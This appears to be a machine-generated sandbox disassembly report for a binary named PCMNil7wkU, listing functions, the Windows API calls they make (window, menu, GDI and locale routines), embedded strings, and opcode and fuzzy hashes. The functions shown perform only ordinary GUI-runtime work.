                                                                                                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                    • API String ID: 0-2723507874
                                                                                                    • Opcode ID: 4bf46c48399c5a3e2a02f48d306bec2353f8d49136998dc47e1d344966d329bb
                                                                                                    • Instruction ID: 39f6dd90a1ec27ffd7fb0225534553792f03e4c60d9c6c5cf853721897eb5aa3
                                                                                                    • Opcode Fuzzy Hash: 4bf46c48399c5a3e2a02f48d306bec2353f8d49136998dc47e1d344966d329bb
                                                                                                    • Instruction Fuzzy Hash: 2971A230A042688AEF31AA6CC8C8BD8B7E5EB0D714F1081E5D549EB2C1DBF5AD85CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 0413A1AB
                                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 0413A1C5
                                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 0413A1F3
                                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 0413A209
                                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 0413A241
                                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 0413A259
                                                                                                      • Part of subcall function 041224FC: MulDiv.KERNEL32(00000000,00000048,?), ref: 0412250D
                                                                                                    • MulDiv.KERNEL32(?), ref: 0413A2B0
                                                                                                    • MulDiv.KERNEL32(?), ref: 0413A2DA
                                                                                                    • MulDiv.KERNEL32(00000000), ref: 0413A300
                                                                                                      • Part of subcall function 04122518: MulDiv.KERNEL32(00000000,?,00000048), ref: 04122525
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 287b33499852eafbc0311c5f82d8a6ea2fb69de1fc2b2f63e22b4a0d190331a0
                                                                                                    • Instruction ID: a4228eb8a1375c4343dea6dd7882c4e9df4d6d6f2b1d19fb7ac8858f33792c8d
                                                                                                    • Opcode Fuzzy Hash: 287b33499852eafbc0311c5f82d8a6ea2fb69de1fc2b2f63e22b4a0d190331a0
                                                                                                    • Instruction Fuzzy Hash: A3514BB0308750AFD320DA69C884A6ABBF9AF49385F04885DF9D6C7251C77AF840CB20
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 0411E97C: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0411E99A
                                                                                                    • GetClassInfoA.USER32(04100000,04152730,?), ref: 04152AF3
                                                                                                    • RegisterClassA.USER32(0416B650), ref: 04152B0B
                                                                                                      • Part of subcall function 0410669C: LoadStringA.USER32(00000000,0000FFF3,?,00001000), ref: 041066CE
                                                                                                    • SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 04152BA7
                                                                                                    • SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 04152BC9
                                                                                                    • SetClassLongA.USER32(0000000E,000000F2,00000000), ref: 04152BDC
                                                                                                    • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,041499E0), ref: 04152BE7
                                                                                                    • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,041499E0), ref: 04152BF6
                                                                                                    • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,041499E0), ref: 04152C03
                                                                                                    • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,041499E0), ref: 04152C1A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2103932818-0
                                                                                                    • Opcode ID: 85b54578ab59b1be2217bd67ee96fec78fcd8769c24575504ec40465330ba2df
                                                                                                    • Instruction ID: 396e5bcb202a6bce84348475a6d4cde70015d394f3c62a3b76122e3ec14b1eda
                                                                                                    • Opcode Fuzzy Hash: 85b54578ab59b1be2217bd67ee96fec78fcd8769c24575504ec40465330ba2df
                                                                                                    • Instruction Fuzzy Hash: 71411A71644244AFF710EF69DDC1FA933A8AB09704F5185A4FE10DB2E6DBB5BC808B24
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetDesktopWindow.USER32 ref: 0413B12B
                                                                                                    • GetDCEx.USER32(?,00000000,00000402), ref: 0413B13E
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0413B161
                                                                                                    • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0413B187
                                                                                                    • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0413B1A9
                                                                                                    • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0413B1C8
                                                                                                    • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0413B1E2
                                                                                                    • SelectObject.GDI32(?,?), ref: 0413B1EF
                                                                                                    • ReleaseDC.USER32(?,?), ref: 0413B209
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ObjectSelect$DesktopReleaseWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1187665388-0
                                                                                                    • Opcode ID: 61512a84cdbf4a1c7a10ad4ce6a0504adfa7399c8664559f023958cc28e8a1ab
                                                                                                    • Instruction ID: 61e487593067d5ce4d50644a0110d4bdb17ce92c6ff4e3f42481ca7b2283543e
                                                                                                    • Opcode Fuzzy Hash: 61512a84cdbf4a1c7a10ad4ce6a0504adfa7399c8664559f023958cc28e8a1ab
                                                                                                    • Instruction Fuzzy Hash: 1031DAB6A00219AFDB01DEECCC85DAFBBBCFF09604B408565B554F7244D6B5AD048B60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetThreadLocale.KERNEL32(00000000,0410D297,?,?,00000000,00000000), ref: 0410D002
                                                                                                      • Part of subcall function 0410B8C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0410B8E2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Locale$InfoThread
                                                                                                    • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                    • API String ID: 4232894706-2493093252
                                                                                                    • Opcode ID: 23dde4a08ef847f46d67133465f0ac0c7fc114045967871819186610dad56d11
                                                                                                    • Instruction ID: 438b1cd2911f4b70bff47975f620b0191eeef21d2765bee1b16fbe40a76a2ddf
                                                                                                    • Opcode Fuzzy Hash: 23dde4a08ef847f46d67133465f0ac0c7fc114045967871819186610dad56d11
                                                                                                    • Instruction Fuzzy Hash: 1B614E70B5414C9BFB10FAE4E9D0A9E77A5EB88208F14D839E100AB7C5CBB8FD459B51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetClassInfoA.USER32(?,?,?), ref: 0413E650
                                                                                                    • UnregisterClassA.USER32(?,?), ref: 0413E678
                                                                                                    • RegisterClassA.USER32(?), ref: 0413E68E
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 0413E6CA
                                                                                                    • GetWindowLongA.USER32(00000000,000000F4), ref: 0413E6DF
                                                                                                    • SetWindowLongA.USER32(00000000,000000F4,00000000), ref: 0413E6F2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassLongWindow$InfoRegisterUnregister
                                                                                                    • String ID: @
                                                                                                    • API String ID: 717780171-2766056989
                                                                                                    • Opcode ID: 65bef3b20a9b7c49ffe80f2103e14c7ff848038803821a811f4351003e10e4ae
                                                                                                    • Instruction ID: fb55efe64610c00fa91307530d5452438ee5cf692f15aad6c3a91dd6cde3bac3
                                                                                                    • Opcode Fuzzy Hash: 65bef3b20a9b7c49ffe80f2103e14c7ff848038803821a811f4351003e10e4ae
                                                                                                    • Instruction Fuzzy Hash: C6517C706003549BEB20EBA8CCC4BDE77F9AF05309F4085A9E859E72D1EB70B945CB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetMonitorInfoA.USER32(?,?), ref: 0412B001
                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0412B028
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 0412B03D
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 0412B048
                                                                                                    • lstrcpyA.KERNEL32(?,DISPLAY), ref: 0412B072
                                                                                                      • Part of subcall function 0412ACA4: GetProcAddress.KERNEL32(75A50000,00000000), ref: 0412AD23
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                                                                                    • String ID: DISPLAY$GetMonitorInfo
                                                                                                    • API String ID: 1539801207-1633989206
                                                                                                    • Opcode ID: 3ada01e7ef85b4f9a01adf08d6ebc208dfc59286ce3d824e98b184d7208343fa
                                                                                                    • Instruction ID: d74c3960fa9f6a48590927d220bd316e11720081b17df1d5bf656027db9e4636
                                                                                                    • Opcode Fuzzy Hash: 3ada01e7ef85b4f9a01adf08d6ebc208dfc59286ce3d824e98b184d7208343fa
                                                                                                    • Instruction Fuzzy Hash: 6B11E131B04720AFE721CF259A847A7B7F8EF05750F004529ED65D7240DBB8BC588BA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,041046CF,?,?,041997C8,?,?,0416A7AC,041068FD,04169751), ref: 04104641
                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,041046CF,?,?,041997C8,?,?,0416A7AC,041068FD,04169751), ref: 04104647
                                                                                                    • GetStdHandle.KERNEL32(000000F5,04104690,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,041046CF,?,?,041997C8), ref: 0410465C
                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,04104690,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,041046CF,?,?), ref: 04104662
                                                                                                    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 04104680
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileHandleWrite$Message
                                                                                                    • String ID: Error$Runtime error at 00000000
                                                                                                    • API String ID: 1570097196-2970929446
                                                                                                    • Opcode ID: c8fbc3e3d8cef7f7454c6d913c69e826580f85bb540fe482451466238c888fa8
                                                                                                    • Instruction ID: 75ef87596165276cb5df5cf913f3b70af86957fbd52663284898c5631868ab6f
                                                                                                    • Opcode Fuzzy Hash: c8fbc3e3d8cef7f7454c6d913c69e826580f85bb540fe482451466238c888fa8
                                                                                                    • Instruction Fuzzy Hash: 54F030716A43C0B5FA24B6506CC5FD927689B46F29F24C749F360A80C1ABEDBCC49F25
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ImageList_DrawEx.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 04155F2F
                                                                                                    • ImageList_DrawEx.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 04155FD0
                                                                                                    • SetTextColor.GDI32(00000000,00FFFFFF), ref: 0415601D
                                                                                                    • SetBkColor.GDI32(00000000,00000000), ref: 04156025
                                                                                                    • BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 0415604A
                                                                                                      • Part of subcall function 04155EA8: ImageList_GetBkColor.COMCTL32(00000000,?,04155F09,00000000,?), ref: 04155EBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ColorImageList_$Draw$Text
                                                                                                    • String ID:
                                                                                                    • API String ID: 2027629008-0
                                                                                                    • Opcode ID: 92572ab2cd5c720ba2e899adb0b4c01a32bd45ad09c3211a037dce391de4f121
                                                                                                    • Instruction ID: 2f58d1a2726c91157aa1b83666bfb24f804deec8eea9e48f1aafa09f08cf45d6
                                                                                                    • Opcode Fuzzy Hash: 92572ab2cd5c720ba2e899adb0b4c01a32bd45ad09c3211a037dce391de4f121
                                                                                                    • Instruction Fuzzy Hash: DD51F271740219BFEB54EF68CEC1F9E77A9AF08218F140160BA14EB296CB74FC518B65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetCapture.USER32 ref: 04150715
                                                                                                    • GetCapture.USER32 ref: 04150724
                                                                                                    • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 0415072A
                                                                                                    • ReleaseCapture.USER32 ref: 0415072F
                                                                                                    • GetActiveWindow.USER32 ref: 04150780
                                                                                                    • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 04150816
                                                                                                    • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 04150883
                                                                                                    • GetActiveWindow.USER32 ref: 04150892
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                                    • String ID:
                                                                                                    • API String ID: 862346643-0
                                                                                                    • Opcode ID: 0e8d4f9ae9e8721f25eb3898d58268e664dda836969ff67d971401129f1cfc85
                                                                                                    • Instruction ID: 1d4711def52743ada081fb0e143caf45291c29ef2855b4b4cdda61b371fc99e8
                                                                                                    • Opcode Fuzzy Hash: 0e8d4f9ae9e8721f25eb3898d58268e664dda836969ff67d971401129f1cfc85
                                                                                                    • Instruction Fuzzy Hash: 29510A30A00284EFEB15EFA5C9C6B9D7BF5EF49704F1540A4E814AB2A1DB75BE84CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SaveDC.GDI32(?), ref: 0413FD79
                                                                                                      • Part of subcall function 04138B74: GetWindowOrgEx.GDI32(00000000), ref: 04138B82
                                                                                                      • Part of subcall function 04138B74: SetWindowOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 04138B98
                                                                                                    • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0413FDB2
                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 0413FDC6
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 0413FDE7
                                                                                                    • SetRect.USER32(?,00000000,00000000,?,?), ref: 0413FE17
                                                                                                    • DrawEdge.USER32(?,?,00000000,00000000), ref: 0413FE26
                                                                                                    • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0413FE4F
                                                                                                    • RestoreDC.GDI32(?,?), ref: 0413FECE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                                                                                    • String ID:
                                                                                                    • API String ID: 2976466617-0
                                                                                                    • Opcode ID: 57a82e6ef6f1037efc387804484e0afe7d564d34bb21f81ceb8fc519a169756a
                                                                                                    • Instruction ID: 8c3b95b8916903e56e33aa0768e71ca7658086cdeadcb039038974be68b75dbd
                                                                                                    • Opcode Fuzzy Hash: 57a82e6ef6f1037efc387804484e0afe7d564d34bb21f81ceb8fc519a169756a
                                                                                                    • Instruction Fuzzy Hash: 0841E775A04209AFEB10EBA8C9C5F9EB7B9EF48304F1141A0BA14EB295D774BE41CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetCapture.USER32 ref: 04153BE2
                                                                                                    • IsWindowUnicode.USER32(00000000), ref: 04153C25
                                                                                                    • SendMessageW.USER32(00000000,-0000BBEE,029367A0,?), ref: 04153C40
                                                                                                    • SendMessageA.USER32(00000000,-0000BBEE,029367A0,?), ref: 04153C5F
                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 04153C6E
                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 04153C7C
                                                                                                    • SendMessageA.USER32(00000000,-0000BBEE,029367A0,?), ref: 04153C9C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                                                                                                    • String ID:
                                                                                                    • API String ID: 1994056952-0
                                                                                                    • Opcode ID: c967fa25f372b36ebbd55f29f1fd7f346df7aac56da4345a4c5aa7dbfec4c185
                                                                                                    • Instruction ID: b3fe3c7da69aa2f3f7e93e14db088f203067560ac39259354f0d7909b5d2c5fa
                                                                                                    • Opcode Fuzzy Hash: c967fa25f372b36ebbd55f29f1fd7f346df7aac56da4345a4c5aa7dbfec4c185
                                                                                                    • Instruction Fuzzy Hash: 2A214D7120424CAFE760FAA9CDC0EA7B3EDAB49294B108466FD79C7691D790F8208770
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 04123A76
                                                                                                    • GetDeviceCaps.GDI32(?,00000068), ref: 04123A92
                                                                                                    • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 04123AB1
                                                                                                    • GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 04123AD5
                                                                                                    • GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 04123AF3
                                                                                                    • GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 04123B07
                                                                                                    • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 04123B27
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 04123B3F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EntriesPaletteSystem$CapsDeviceRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 1781840570-0
                                                                                                    • Opcode ID: 191eb7fc297a61615a6461e4851abeabe30e28640bf97c6191c7a7f2a311427c
                                                                                                    • Instruction ID: a85acab48ca84193f06c5c581715deed06e086f7b786f12b00f60f798281a841
                                                                                                    • Opcode Fuzzy Hash: 191eb7fc297a61615a6461e4851abeabe30e28640bf97c6191c7a7f2a311427c
                                                                                                    • Instruction Fuzzy Hash: 782144B1A40218AFEB10DBA4CDC5FAE73BCEB08704F504591BB44E61C0D7B9BE508B29
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(00000000,0412FBED), ref: 0412FA38
                                                                                                    • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 0412FB41
                                                                                                      • Part of subcall function 0412FEA0: CreatePopupMenu.USER32 ref: 0412FEBB
                                                                                                    • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 0412FBCA
                                                                                                      • Part of subcall function 0412FEA0: CreateMenu.USER32 ref: 0412FEC5
                                                                                                    • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 0412FBB1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                                    • String ID: ,$?
                                                                                                    • API String ID: 2359071979-2308483597
                                                                                                    • Opcode ID: cafc768d735db7036aada86d17d75eb83217c915fc6e6ec44d7a491d61c5de27
                                                                                                    • Instruction ID: efca5af7a0bde08ef43d59ecbf431e84a19acf6c8fed528e558806d523d0af77
                                                                                                    • Opcode Fuzzy Hash: cafc768d735db7036aada86d17d75eb83217c915fc6e6ec44d7a491d61c5de27
                                                                                                    • Instruction Fuzzy Hash: 6A61F330A04264AFEB10EF69DAC0A6A77F5EF06304F4441A5ED50E7285D738FD66DB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,041438EC), ref: 041437ED
                                                                                                    • GetTickCount.KERNEL32 ref: 041437F2
                                                                                                    • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 04143836
                                                                                                    • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 0414384E
                                                                                                    • AnimateWindow.USER32(00000000,00000064,?), ref: 04143893
                                                                                                    • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,041438EC), ref: 041438B6
                                                                                                      • Part of subcall function 04146EC8: GetCursorPos.USER32(?), ref: 04146ECC
                                                                                                    • GetTickCount.KERNEL32 ref: 041438D3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3024527889-0
                                                                                                    • Opcode ID: 3d5573c445a8be8317e21363896d4081c1771d5ae05af0a9fb1147a040ee48b0
